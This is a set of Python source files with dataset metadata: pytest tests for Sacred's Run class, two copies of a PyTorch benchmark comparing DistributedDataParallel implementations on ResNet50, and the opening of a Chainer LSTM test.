    with capsys.disabled():
        run()
    assert run.captured_out == '0123456789'
def test_captured_out_filter(run, capsys):
def print_mock_progress():
sys.stdout.write('progress 0')
sys.stdout.flush()
for i in range(10):
sys.stdout.write('\b')
sys.stdout.write(str(i))
sys.stdout.flush()
run.captured_out_filter = apply_backspaces_and_linefeeds
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
sys.stdout.flush()
assert run.captured_out == 'progress 9'
| 29.861314 | 97 | 0.712173 |
from __future__ import division, print_function, unicode_literals
from datetime import datetime
import mock
import os
import pytest
import tempfile
import sys
from sacred.run import Run
from sacred.config.config_summary import ConfigSummary
from sacred.utils import (ObserverError, SacredInterrupt, TimeoutInterrupt,
apply_backspaces_and_linefeeds)
@pytest.fixture
def run():
config = {'a': 17, 'foo': {'bar': True, 'baz': False}, 'seed': 1234}
config_mod = ConfigSummary()
signature = mock.Mock()
signature.name = 'main_func'
main_func = mock.Mock(return_value=123, prefix='', signature=signature)
logger = mock.Mock()
observer = [mock.Mock(priority=10)]
return Run(config, config_mod, main_func, observer, logger, logger, {},
{}, [], [])
def test_run_attributes(run):
assert isinstance(run.config, dict)
assert isinstance(run.config_modifications, ConfigSummary)
assert isinstance(run.experiment_info, dict)
assert isinstance(run.host_info, dict)
assert isinstance(run.info, dict)
def test_run_state_attributes(run):
assert run.start_time is None
assert run.stop_time is None
assert run.captured_out == ''
assert run.result is None
def test_run_run(run):
assert run() == 123
assert (run.start_time - datetime.utcnow()).total_seconds() < 1
assert (run.stop_time - datetime.utcnow()).total_seconds() < 1
assert run.result == 123
assert run.captured_out == ''
def test_run_emits_events_if_successful(run):
run()
observer = run.observers[0]
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
@pytest.mark.parametrize('exception,status', [
(KeyboardInterrupt, 'INTERRUPTED'),
(SacredInterrupt, 'INTERRUPTED'),
(TimeoutInterrupt, 'TIMEOUT'),
])
def test_run_emits_events_if_interrupted(run, exception, status):
observer = run.observers[0]
run.main_function.side_effect = exception
with pytest.raises(exception):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert observer.interrupted_event.called
observer.interrupted_event.assert_called_with(
interrupt_time=run.stop_time,
status=status)
assert not observer.failed_event.called
def test_run_emits_events_if_failed(run):
observer = run.observers[0]
run.main_function.side_effect = TypeError
with pytest.raises(TypeError):
run()
assert observer.started_event.called
assert observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert observer.failed_event.called
def test_run_started_event(run):
observer = run.observers[0]
run()
observer.started_event.assert_called_with(
command='main_func',
ex_info=run.experiment_info,
host_info=run.host_info,
start_time=run.start_time,
config=run.config,
meta_info={},
_id=None
)
def test_run_completed_event(run):
observer = run.observers[0]
run()
observer.completed_event.assert_called_with(
stop_time=run.stop_time,
result=run.result
)
def test_run_heartbeat_event(run):
observer = run.observers[0]
run.info['test'] = 321
run()
call_args, call_kwargs = observer.heartbeat_event.call_args_list[0]
assert call_kwargs['info'] == run.info
assert call_kwargs['captured_out'] == ""
assert (call_kwargs['beat_time'] - datetime.utcnow()).total_seconds() < 1
def test_run_artifact_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
metadata = {'testkey': 42}
run.add_artifact(f_name, name='foobar', metadata=metadata)
observer.artifact_event.assert_called_with(filename=f_name, name='foobar', metadata=metadata)
os.close(handle)
os.remove(f_name)
def test_run_resource_event(run):
observer = run.observers[0]
handle, f_name = tempfile.mkstemp()
run.open_resource(f_name)
observer.resource_event.assert_called_with(filename=f_name)
os.close(handle)
os.remove(f_name)
def test_run_cannot_be_started_twice(run):
run()
with pytest.raises(RuntimeError):
run()
def test_run_observer_failure_on_startup_not_caught(run):
observer = run.observers[0]
observer.started_event.side_effect = ObserverError
with pytest.raises(ObserverError):
run()
def test_run_observer_error_in_heartbeat_is_caught(run):
observer = run.observers[0]
observer.heartbeat_event.side_effect = TypeError
run()
assert observer in run._failed_observers
assert observer.started_event.called
assert observer.heartbeat_event.called
assert observer.completed_event.called
def test_run_exception_in_completed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.completed_event.side_effect = TypeError
run()
assert observer.completed_event.called
assert observer2.completed_event.called
def test_run_exception_in_interrupted_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.interrupted_event.side_effect = TypeError
run.main_function.side_effect = KeyboardInterrupt
with pytest.raises(KeyboardInterrupt):
run()
assert observer.interrupted_event.called
assert observer2.interrupted_event.called
def test_run_exception_in_failed_event_is_caught(run):
observer = run.observers[0]
observer2 = mock.Mock(priority=20)
run.observers.append(observer2)
observer.failed_event.side_effect = TypeError
run.main_function.side_effect = AttributeError
with pytest.raises(AttributeError):
run()
assert observer.failed_event.called
assert observer2.failed_event.called
def test_unobserved_run_doesnt_emit(run):
observer = run.observers[0]
run.unobserved = True
run()
assert not observer.started_event.called
assert not observer.heartbeat_event.called
assert not observer.completed_event.called
assert not observer.interrupted_event.called
assert not observer.failed_event.called
def test_stdout_capturing_no(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "no"
with capsys.disabled():
run()
assert run.captured_out == ''
def test_stdout_capturing_sys(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
assert run.captured_out == '0123456789'
@pytest.mark.skip('Breaks randomly on test server')
def test_stdout_capturing_fd(run, capsys):
def print_mock_progress():
for i in range(10):
print(i, end="")
sys.stdout.flush()
run.main_function.side_effect = print_mock_progress
run.capture_mode = "fd"
with capsys.disabled():
run()
assert run.captured_out == '0123456789'
def test_captured_out_filter(run, capsys):
def print_mock_progress():
sys.stdout.write('progress 0')
sys.stdout.flush()
for i in range(10):
sys.stdout.write('\b')
sys.stdout.write(str(i))
sys.stdout.flush()
run.captured_out_filter = apply_backspaces_and_linefeeds
run.main_function.side_effect = print_mock_progress
run.capture_mode = "sys"
with capsys.disabled():
run()
sys.stdout.flush()
assert run.captured_out == 'progress 9'
| true | true |
f73269981546a570cb9a309603dd8f27856144f3 | 9,873 | py | Python | benchmarks/distributed/ddp/compare/compare_ddp.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 60,067 | 2017-01-18T17:21:31.000Z | 2022-03-31T21:37:45.000Z | benchmarks/distributed/ddp/compare/compare_ddp.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 66,955 | 2017-01-18T17:21:38.000Z | 2022-03-31T23:56:11.000Z | benchmarks/distributed/ddp/compare/compare_ddp.py | Hacky-DH/pytorch | 80dc4be615854570aa39a7e36495897d8a040ecc | [
"Intel"
] | 19,210 | 2017-01-18T17:45:04.000Z | 2022-03-31T23:51:56.000Z | """
A simple tool to compare the performance of different impls of
DistributedDataParallel on resnet50, three flavors:
1. DistributedDataParallel, which has a python wrapper and C++ core to do
gradient distribution and reduction. It's current production version.
2. PythonDDP with async gradient reduction.
3. PythonDDP with synchrous gradient reduction.
Example::
>>> modify configs in main func
>>> python compare_ddp.py
>>> Sample out: compare_ddp_sample.md
"""
import numpy as np
import os
import pickle
import glob
import python_ddp
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
from collections import OrderedDict
from enum import Enum
from tabulate import tabulate
from torch.nn.parallel import DistributedDataParallel as DDP
class DDPOption(Enum):
    """Which DistributedDataParallel implementation to benchmark."""

    DDP_CPP_CORE = 1                 # production DDP: python wrapper + C++ core
    PYTHON_DDP_SYNC_REDUCTION = 2    # pure-python DDP, synchronous all-reduce
    PYTHON_DDP_ASYNC_REDUCTION = 3   # pure-python DDP, asynchronous all-reduce
class LatencyData:
    """Raw latency measurements for one (buffer size, DDP option, rank) run."""

    __slots__ = ["buffer_size_in_M", "ddp_option", "rank", "metrics"]

    def __init__(self, buffer_size_in_M, ddp_option, rank, metrics):
        # Bind each constructor argument to the slot of the same name.
        values = (buffer_size_in_M, ddp_option, rank, metrics)
        for slot_name, value in zip(self.__slots__, values):
            setattr(self, slot_name, value)
def serialize(buffer_size_in_M, ddp_option, rank, metrics,
              data_dir="./tmp", ext="ddpraw"):
    """Pickle one rank's metrics to ``{data_dir}/buffer_size_{M}M_rank{r}_{opt}.{ext}``.

    Args:
        buffer_size_in_M: DDP bucket/buffer size in MiB (used in the file name).
        ddp_option: DDPOption of the run; str()-ed into the file name.
        rank: distributed rank that produced ``metrics``.
        metrics: mapping of step name -> list of latencies in milliseconds.
        data_dir: output directory, created if missing.
        ext: file extension for the raw-metric files.
    """
    if not os.path.exists(data_dir):
        print(f'{data_dir} not exist, mkdir {data_dir}')
    # makedirs + exist_ok avoids the exists()/mkdir() race between ranks and
    # also handles nested paths (os.mkdir fails on missing intermediate dirs).
    os.makedirs(data_dir, exist_ok=True)
    file_name = "buffer_size_{}M_rank{}_{}.{}".format(
        buffer_size_in_M, rank, ddp_option, ext)
    file_path = os.path.join(data_dir, file_name)
    print("Writing metrics to file: '{}'".format(file_path))
    data = LatencyData(buffer_size_in_M, ddp_option, rank, metrics)
    with open(file_path, "wb") as f:
        pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
    # Fixed doubled quote in the original message ("...'{file_path}''").
    print(f"Wrote metrics to '{file_path}'")
def load_detailed_metrics(data_dir="./tmp", ext="ddpraw"):
    """Read every pickled LatencyData under ``data_dir`` and regroup them.

    Returns an OrderedDict mapping buffer_size_in_M -> {ddp_option: metrics}.
    """
    assert os.path.exists(data_dir)
    matched_files = glob.glob(os.path.join(data_dir, f"*.{ext}"))
    print("load_detailed_metrics found {} files".format(len(matched_files)))
    grouped = OrderedDict()
    for path in matched_files:
        with open(path, "rb") as fh:
            record = pickle.load(fh)
        # One inner dict per buffer size; each option contributes its metrics.
        per_option = grouped.setdefault(record.buffer_size_in_M, {})
        per_option[record.ddp_option] = record.metrics
    return grouped
def setup(rank, world_size):
    """Point the rendezvous at localhost and join the default "gloo" group."""
    rendezvous = {'MASTER_ADDR': 'localhost', 'MASTER_PORT': '12355'}
    os.environ.update(rendezvous)
    dist.init_process_group("gloo", rank=rank, world_size=world_size)
def create_ddp_model(module, rank, pg, ddp_option, buffer_size_in_M):
    """Wrap ``module`` in the DDP implementation selected by ``ddp_option``."""
    if ddp_option == DDPOption.DDP_CPP_CORE:
        # Production DDP: C++ reducer with bucketed all-reduce, sized in MB.
        wrapped = DDP(module, device_ids=[rank],
                      process_group=pg,
                      bucket_cap_mb=buffer_size_in_M)
        wrapped._set_static_graph()
        return wrapped
    python_options = (DDPOption.PYTHON_DDP_SYNC_REDUCTION,
                      DDPOption.PYTHON_DDP_ASYNC_REDUCTION)
    if ddp_option in python_options:
        # PythonDDP takes its buffer size in bytes; the boolean flag selects
        # asynchronous vs synchronous gradient reduction.
        use_async = ddp_option == DDPOption.PYTHON_DDP_ASYNC_REDUCTION
        return python_ddp.PythonDDP(module, pg, use_async,
                                    buffer_size=buffer_size_in_M * (2 ** 20))
    raise NotImplementedError
def run_ddp(rank, world_size, epochs, ddp_option, buffer_size_in_M, warmup_iterations=20):
    """Benchmark forward/backward latency of one DDP flavor on this rank.

    Spawned once per rank by mp.spawn. Trains resnet50 on random data for
    ``epochs`` iterations, timing forward and backward passes with CUDA
    events, then pickles the collected metrics via serialize().

    Args:
        rank: this process's distributed rank (also its CUDA device index).
        world_size: total number of ranks in the job.
        epochs: total iterations; must exceed ``warmup_iterations``.
        ddp_option: DDPOption selecting which DDP implementation to wrap with.
        buffer_size_in_M: gradient bucket/buffer size in MiB.
        warmup_iterations: leading iterations excluded from the metrics.
    """
    print(f'Invoked run_ddp rank {rank}')
    assert epochs > warmup_iterations
    # Setup
    print("setting up ... ")
    setup(rank, world_size)
    # Seed per-rank so each rank draws different random inputs deterministically.
    torch.manual_seed(rank)
    torch.cuda.manual_seed(rank)
    device = torch.device('cuda:%d' % rank)
    print('setup done')
    # Create ResNet50 module and wrap in DDP module.
    pg = dist.distributed_c10d._get_default_group()
    model = models.resnet50().to(device)
    ddp_model = create_ddp_model(model, rank, pg, ddp_option, buffer_size_in_M)
    assert ddp_model is not None
    loss_fn = nn.MSELoss()
    optimizer = optim.SGD(ddp_model.parameters(), lr=0.001)
    # Container to hold: event -> list of events in milliseconds
    MODEL_FORWARD = "forward"
    MODEL_BACKWARD = "backward"
    metrics = {MODEL_FORWARD: [], MODEL_BACKWARD: []}
    for epoch in range(epochs):
        if epoch % 10 == 0:
            print(f'Epoch {epoch}/{epochs} ...')
        # CUDA events measure device-side elapsed time in milliseconds.
        start = torch.cuda.Event(enable_timing=True)
        end = torch.cuda.Event(enable_timing=True)
        # TODO(bowangbj): Switch to real training set from ImageNet.
        inputs = torch.rand([32, 3, 224, 224], device=device)
        labels = torch.rand([32, 1000], device=device)
        # Forward
        start.record()
        outputs = ddp_model(inputs)
        loss = loss_fn(outputs, labels)
        end.record()
        # elapsed_time is only valid once both events have completed on device.
        torch.cuda.synchronize()
        if epoch >= warmup_iterations:
            metrics[MODEL_FORWARD].append(start.elapsed_time(end))
        # Backward
        start.record()
        loss.backward()
        # Reduce all grad, this is needed for non-DDP_CPP_CORE since the hook
        # for all_reduce does not exist yet.
        if ddp_option != DDPOption.DDP_CPP_CORE:
            ddp_model.all_reduce_grads()
        end.record()
        torch.cuda.synchronize()
        if epoch >= warmup_iterations:
            metrics[MODEL_BACKWARD].append(start.elapsed_time(end))
        # Optimization
        optimizer.step()
        optimizer.zero_grad()
    # Only rank 0 prints the summary, to avoid interleaved output from ranks.
    if rank == 0:
        print(f"\nMetrics for GPU {rank}, ddp_option={ddp_option}, buffer_size={buffer_size_in_M}M")
        # NOTE(review): "warmpup" below is a typo for "warmup" in the log
        # message; left untouched since this update changes comments only.
        print(f"Skipped {warmup_iterations} CUDA warmpup iterations. ")
        for step, elapsed_milliseconds in metrics.items():
            A = np.array(elapsed_milliseconds)
            print(' {N} iterations, {step}, mean={mean} ms, median={median} ms, p90={p90} ms, p99={p99} ms'.format(
                N=len(A), step=step, mean=np.mean(A),
                median=np.percentile(A, 50), p90=np.percentile(A, 90),
                p99=np.percentile(A, 99)))
    # Serialize the raw data to be used to compute summary. Didn't choose to
    # maintain a global object holding the metrics b/c mp.spawn tries to
    # fork all the arguments before spawning new process thus it's infeasible
    # save global states in an object.
    serialize(buffer_size_in_M, ddp_option, rank, metrics)
def append_delta(row_list, base, exp):
    """Append to ``row_list`` the percent change of ``exp`` relative to ``base``."""
    relative_change = (exp - base) / base
    row_list.append(100 * relative_change)
def print_summary(buffer_size_to_metrics):
    """Print, per buffer size, latency tables comparing each option to DDP_CPP_CORE.

    Args:
        buffer_size_to_metrics: buffer_size_in_M -> {ddp_option: metrics},
            where metrics maps step name ("forward"/"backward") -> list of
            latencies in milliseconds.
    """
    for buffer_size, metrics in buffer_size_to_metrics.items():
        # DDP_CPP_CORE (production DDP) is the baseline everything is compared to.
        assert DDPOption.DDP_CPP_CORE in metrics.keys()
        baseline = metrics.get(DDPOption.DDP_CPP_CORE)
        print(f"=== Summary for buffer_size: {buffer_size}M === ")
        for step in baseline.keys():
            # step takes value from [forward, backward].
            # Each row: [option, mean, delta%, p50, delta%, p90, delta%,
            #            p95, delta%, p99, delta%], deltas relative to the
            # baseline's corresponding statistic.
            data = []
            baseline_latencies = baseline.get(step)
            assert baseline_latencies is not None
            A_baseline = np.array(baseline_latencies)
            for ddp_option, exp_metrics in metrics.items():
                exp_latencies = exp_metrics.get(step)
                assert exp_latencies is not None
                A_exp = np.array(exp_latencies)
                row = [ddp_option]
                row.append(np.mean(A_exp))
                append_delta(row, np.mean(A_baseline), np.mean(A_exp))
                for px in [50, 90, 95, 99]:
                    base = np.percentile(A_baseline, px)
                    exp = np.percentile(A_exp, px)
                    row.append(exp)
                    append_delta(row, base, exp)
                data.append(row)
            # Header fix: the second statistic column is the 50th percentile
            # (the code appends px=50 first), not a second "mean"; also the
            # p95 delta header had a doubled percent sign ("delta%%").
            print(tabulate(data,
                           headers=[f"DDP: [{step}]", "mean", "delta%",
                                    "p50", "delta%", "p90", "delta%",
                                    "p95", "delta%", "p99", "delta%"]))
            print("\n")
def main():
    """Sweep DDP buffer sizes and benchmark each DDP flavor, then summarize."""
    world_size = 2
    epochs = 120
    # resnet50 model facts:
    #   total_param_count = 161
    #   total_elements = 25557032 ~= 24.37M
    #   param_max_elements = 2359296 ~= 2.25M
    # Try different bucket sizes: 3M .. 27M inclusive (was a 25-element
    # hand-written literal list; range() is equivalent and less error-prone).
    buffer_size_in_mbs = list(range(3, 28))
    print("buffer_size_in_mbs: " + str(buffer_size_in_mbs))
    for buffer_size_in_M in buffer_size_in_mbs:
        print("\n\n=== NEW EXPERIMENT: buffer_size={}M, {} epochs, world_size={} ===".format(
            buffer_size_in_M, epochs, world_size))
        options = [
            DDPOption.DDP_CPP_CORE,
            DDPOption.PYTHON_DDP_ASYNC_REDUCTION,
            DDPOption.PYTHON_DDP_SYNC_REDUCTION
        ]
        for option in options:
            print("Measuring option: {} ... ".format(option))
            # One worker process per rank; join=True blocks until all finish.
            mp.spawn(run_ddp,
                     args=(world_size, epochs, option, buffer_size_in_M),
                     nprocs=world_size,
                     join=True)
    print("\n Generating summaries ... ")
    buffer_size_to_metrics = load_detailed_metrics(data_dir="./tmp", ext="ddpraw")
    print_summary(buffer_size_to_metrics)


if __name__ == "__main__":
    main()
| 38.416342 | 118 | 0.637395 |
import numpy as np
import os
import pickle
import glob
import python_ddp
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models
from collections import OrderedDict
from enum import Enum
from tabulate import tabulate
from torch.nn.parallel import DistributedDataParallel as DDP
class DDPOption(Enum):
    """DistributedDataParallel implementation variants benchmarked here."""
    # PyTorch's built-in C++ DDP; used as the baseline in print_summary.
    DDP_CPP_CORE = 1
    # python_ddp.PythonDDP constructed with async flag False (see create_ddp_model).
    PYTHON_DDP_SYNC_REDUCTION = 2
    # python_ddp.PythonDDP constructed with async flag True (see create_ddp_model).
    PYTHON_DDP_ASYNC_REDUCTION = 3
class LatencyData:
    """Pickle-friendly record of one rank's measured latencies.

    Fields:
        buffer_size_in_M: gradient bucket size (in MB) used for the run.
        ddp_option: which DDPOption variant produced the numbers.
        rank: distributed rank that recorded the metrics.
        metrics: mapping of step name -> list of latencies in milliseconds.
    """
    __slots__ = ["buffer_size_in_M", "ddp_option", "rank", "metrics"]

    def __init__(self, buffer_size_in_M, ddp_option, rank, metrics):
        # Assign positionally in slot order; keeps the field list in one place.
        values = (buffer_size_in_M, ddp_option, rank, metrics)
        for slot, value in zip(self.__slots__, values):
            setattr(self, slot, value)
def serialize(buffer_size_in_M, ddp_option, rank, metrics,
              data_dir="./tmp", ext="ddpraw"):
    """Pickle one rank's latency metrics into ``data_dir``.

    The file name embeds bucket size, rank and DDP option so that
    ``load_detailed_metrics`` can aggregate runs later.

    Args:
        buffer_size_in_M: gradient bucket size (MB) used for the run.
        ddp_option: DDPOption variant that produced the metrics.
        rank: distributed rank writing the file.
        metrics: mapping of step name -> list of latencies in milliseconds.
        data_dir: destination directory, created if missing.
        ext: file extension for the serialized record.
    """
    if not os.path.exists(data_dir):
        print(f'{data_dir} not exist, mkdir {data_dir}')
        # makedirs(exist_ok=True) also creates missing parents and does not
        # race when several ranks create the directory concurrently
        # (os.mkdir would raise for either case).
        os.makedirs(data_dir, exist_ok=True)
    file_name = "buffer_size_{}M_rank{}_{}.{}".format(
        buffer_size_in_M, rank, ddp_option, ext)
    file_path = os.path.join(data_dir, file_name)
    print("Writing metrics to file: '{}'".format(file_path))
    data = LatencyData(buffer_size_in_M, ddp_option, rank, metrics)
    with open(file_path, "wb") as f:
        pickle.dump(data, f, pickle.HIGHEST_PROTOCOL)
    # Fixed: message previously ended with a stray doubled quote.
    print(f"Wrote metrics to '{file_path}'")
def load_detailed_metrics(data_dir="./tmp", ext="ddpraw"):
    """Load every pickled LatencyData file under ``data_dir``.

    Returns:
        OrderedDict mapping buffer_size_in_M -> {ddp_option: metrics},
        where metrics is the step -> [latency_ms] mapping stored by
        ``serialize``.
    """
    assert os.path.exists(data_dir)
    matched_files = glob.glob(os.path.join(data_dir, f"*.{ext}"))
    print("load_detailed_metrics found {} files".format(len(matched_files)))
    buffer_size_to_metrics = OrderedDict()
    for file_path in matched_files:
        with open(file_path, "rb") as fh:
            record = pickle.load(fh)
        # Group records by bucket size, then by DDP option within it.
        per_option = buffer_size_to_metrics.setdefault(record.buffer_size_in_M, {})
        per_option[record.ddp_option] = record.metrics
    return buffer_size_to_metrics
def setup(rank, world_size):
    """Join the default "gloo" process group for this rank.

    Sets the rendezvous address/port in the environment, then blocks in
    init_process_group until all ranks have joined.
    """
    rendezvous = {
        'MASTER_ADDR': 'localhost',
        'MASTER_PORT': '12355',
    }
    os.environ.update(rendezvous)
    # initialize the process group
    dist.init_process_group("gloo", rank=rank, world_size=world_size)
def create_ddp_model(module, rank, pg, ddp_option, buffer_size_in_M):
    """Wrap ``module`` in the DDP implementation selected by ``ddp_option``.

    Raises:
        NotImplementedError: for any unrecognized ``ddp_option``.
    """
    if ddp_option == DDPOption.DDP_CPP_CORE:
        ddp_model = DDP(module, device_ids=[rank],
                        process_group=pg,
                        bucket_cap_mb=buffer_size_in_M)
        ddp_model._set_static_graph()
        return ddp_model
    # Both Python variants share construction; they differ only in the
    # async-reduction flag passed to PythonDDP.
    async_flag_by_option = {
        DDPOption.PYTHON_DDP_SYNC_REDUCTION: False,
        DDPOption.PYTHON_DDP_ASYNC_REDUCTION: True,
    }
    if ddp_option in async_flag_by_option:
        bytes_per_mb = 2 ** 20
        return python_ddp.PythonDDP(module, pg, async_flag_by_option[ddp_option],
                                    buffer_size=buffer_size_in_M * bytes_per_mb)
    raise NotImplementedError
def run_ddp(rank, world_size, epochs, ddp_option, buffer_size_in_M, warmup_iterations=20):
    """Benchmark ResNet50 forward/backward latency for one DDP variant.

    Spawned once per rank by ``mp.spawn``. Runs ``epochs`` training
    iterations on random inputs, timing forward and backward passes with
    CUDA events, skipping the first ``warmup_iterations`` measurements,
    and finally pickles the raw latencies via ``serialize``.

    Args:
        rank: this process's distributed rank (also its GPU index).
        world_size: total number of ranks.
        epochs: total iterations to run (must exceed ``warmup_iterations``).
        ddp_option: DDPOption selecting the implementation under test.
        buffer_size_in_M: gradient bucket size in MB.
        warmup_iterations: leading iterations excluded from the metrics.
    """
    print(f'Invoked run_ddp rank {rank}')
    assert epochs > warmup_iterations

    # Setup
    print("setting up ... ")
    setup(rank, world_size)
    torch.manual_seed(rank)
    torch.cuda.manual_seed(rank)
    device = torch.device('cuda:%d' % rank)
    print('setup done')

    # Create ResNet50 module and wrap in DDP module.
    pg = dist.distributed_c10d._get_default_group()
    model = models.resnet50().to(device)
    ddp_model = create_ddp_model(model, rank, pg, ddp_option, buffer_size_in_M)
    assert ddp_model is not None
    loss_fn = nn.MSELoss()
    optimizer = optim.SGD(ddp_model.parameters(), lr=0.001)

    # Container to hold: event -> list of latencies in milliseconds.
    MODEL_FORWARD = "forward"
    MODEL_BACKWARD = "backward"
    metrics = {MODEL_FORWARD: [], MODEL_BACKWARD: []}

    for epoch in range(epochs):
        if epoch % 10 == 0:
            print(f'Epoch {epoch}/{epochs} ...')
        start = torch.cuda.Event(enable_timing=True)
        end = torch.cuda.Event(enable_timing=True)

        # TODO(bowangbj): Switch to real training set from ImageNet.
        inputs = torch.rand([32, 3, 224, 224], device=device)
        labels = torch.rand([32, 1000], device=device)

        # Forward. Note the timed section includes the loss computation.
        start.record()
        outputs = ddp_model(inputs)
        loss = loss_fn(outputs, labels)
        end.record()
        torch.cuda.synchronize()
        if epoch >= warmup_iterations:
            metrics[MODEL_FORWARD].append(start.elapsed_time(end))

        # Backward
        start.record()
        loss.backward()
        # Reduce all grad, this is needed for non-DDP_CPP_CORE since the hook
        # for all_reduce does not exist yet.
        if ddp_option != DDPOption.DDP_CPP_CORE:
            ddp_model.all_reduce_grads()
        end.record()
        torch.cuda.synchronize()
        if epoch >= warmup_iterations:
            metrics[MODEL_BACKWARD].append(start.elapsed_time(end))

        # Optimization
        optimizer.step()
        optimizer.zero_grad()

    # Only rank 0 prints the human-readable summary.
    if rank == 0:
        print(f"\nMetrics for GPU {rank}, ddp_option={ddp_option}, buffer_size={buffer_size_in_M}M")
        # Fixed typo: "warmpup" -> "warmup".
        print(f"Skipped {warmup_iterations} CUDA warmup iterations.")
        for step, elapsed_milliseconds in metrics.items():
            A = np.array(elapsed_milliseconds)
            print(' {N} iterations, {step}, mean={mean} ms, median={median} ms, p90={p90} ms, p99={p99} ms'.format(
                N=len(A), step=step, mean=np.mean(A),
                median=np.percentile(A, 50), p90=np.percentile(A, 90),
                p99=np.percentile(A, 99)))

    # Serialize the raw data to be used to compute summary. Didn't choose to
    # save global states in an object. Every rank writes its own file (the
    # file name embeds the rank), so this runs at function scope.
    serialize(buffer_size_in_M, ddp_option, rank, metrics)
def append_delta(row_list, base, exp):
    """Append to ``row_list`` the relative change of ``exp`` vs ``base``, in percent."""
    relative_change = (exp - base) / base
    row_list.append(relative_change * 100)
def print_summary(buffer_size_to_metrics):
    """Print per-bucket-size latency tables comparing each DDP variant
    against the DDP_CPP_CORE baseline.

    Args:
        buffer_size_to_metrics: OrderedDict as returned by
            ``load_detailed_metrics``:
            {buffer_size_in_M: {ddp_option: {step: [latency_ms]}}}.
    """
    # metrics: {ddp_option, Metrics}
    # Metrics: step -> [latency]
    for buffer_size, metrics in buffer_size_to_metrics.items():
        assert DDPOption.DDP_CPP_CORE in metrics.keys()
        baseline = metrics.get(DDPOption.DDP_CPP_CORE)
        print(f"=== Summary for buffer_size: {buffer_size}M === ")
        for step in baseline.keys():
            # step takes value from [forward, backward].
            # Each row:
            # [option, mean, delta, p50, delta, p90, delta, p95, delta, p99, delta]
            data = []
            baseline_latencies = baseline.get(step)
            assert baseline_latencies is not None
            A_baseline = np.array(baseline_latencies)
            for ddp_option, exp_metrics in metrics.items():
                exp_latencies = exp_metrics.get(step)
                assert exp_latencies is not None
                A_exp = np.array(exp_latencies)
                # Yield option, mean, p50, p90, p95, p99, each followed by
                # its percentage delta vs the baseline.
                row = [ddp_option]
                row.append(np.mean(A_exp))
                append_delta(row, np.mean(A_baseline), np.mean(A_exp))
                for px in [50, 90, 95, 99]:
                    base = np.percentile(A_baseline, px)
                    exp = np.percentile(A_exp, px)
                    row.append(exp)
                    append_delta(row, base, exp)
                data.append(row)
            # Output buffer_size, step as a table.
            # Fixed headers: the p50 column was mislabeled "mean" and the
            # p95 delta header contained a literal "%%".
            print(tabulate(data,
                           headers=[f"DDP: [{step}]", "Mean", "delta%",
                                    "p50", "delta%", "p90", "delta%",
                                    "p95", "delta%", "p99", "delta%"]))
            print("\n")
def main():
    """Sweep gradient-bucket sizes across DDP implementations and summarize."""
    world_size = 2
    epochs = 120
    # resnet50 model facts:
    # total_param_count = 161
    # total_elements = 25557032 ~= 24.37M
    # param_max_elements = 2359296 ~= 2.25M
    # Try bucket sizes from 3M through 27M inclusive.
    buffer_size_in_mbs = list(range(3, 28))
    print("buffer_size_in_mbs: " + str(buffer_size_in_mbs))
    # Variants to measure for every bucket size.
    options = [
        DDPOption.DDP_CPP_CORE,
        DDPOption.PYTHON_DDP_ASYNC_REDUCTION,
        DDPOption.PYTHON_DDP_SYNC_REDUCTION
    ]
    for buffer_size_in_M in buffer_size_in_mbs:
        print("\n\n=== NEW EXPERIMENT: buffer_size={}M, {} epochs, world_size={} ===".format(
            buffer_size_in_M, epochs, world_size))
        for option in options:
            print(f"Measuring option: {option} ... ")
            # One process per rank; each pickles its raw latencies to ./tmp.
            mp.spawn(run_ddp,
                     args=(world_size, epochs, option, buffer_size_in_M),
                     nprocs=world_size,
                     join=True)
    print("\n Generating summaries ... ")
    buffer_size_to_metrics = load_detailed_metrics(data_dir="./tmp", ext="ddpraw")
    print_summary(buffer_size_to_metrics)
# Script entry point: runs the full bucket-size sweep.
if __name__ == "__main__" :
    main()
| true | true |
f7326999dc24482830c16aa9561534ecbfcf6ab2 | 9,195 | py | Python | tests/chainer_tests/functions_tests/connection_tests/test_n_step_lstm.py | mingxiaoh/chainer-v3 | 815ff00f5eaf7944d6e8a75662ff64a2fe046a4d | [
"BSD-3-Clause"
] | 7 | 2017-05-08T07:02:40.000Z | 2018-12-02T18:35:39.000Z | tests/chainer_tests/functions_tests/connection_tests/test_n_step_lstm.py | mingxiaoh/chainer-v3 | 815ff00f5eaf7944d6e8a75662ff64a2fe046a4d | [
"BSD-3-Clause"
] | null | null | null | tests/chainer_tests/functions_tests/connection_tests/test_n_step_lstm.py | mingxiaoh/chainer-v3 | 815ff00f5eaf7944d6e8a75662ff64a2fe046a4d | [
"BSD-3-Clause"
] | null | null | null | import unittest
import mock
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
def sigmoid(x):
    """Elementwise logistic sigmoid, computed via the numerically stable
    tanh identity: sigmoid(x) = 0.5 * tanh(x / 2) + 0.5."""
    half = 0.5
    return half * numpy.tanh(x * half) + half
def _split(inputs, pos):
return inputs[:pos], inputs[pos:]
@testing.parameterize(*testing.product({
    'use_cudnn': [True, False],
}))
class TestNStepLSTM(unittest.TestCase):
    """Tests functions.n_step_lstm against a NumPy reference implementation.

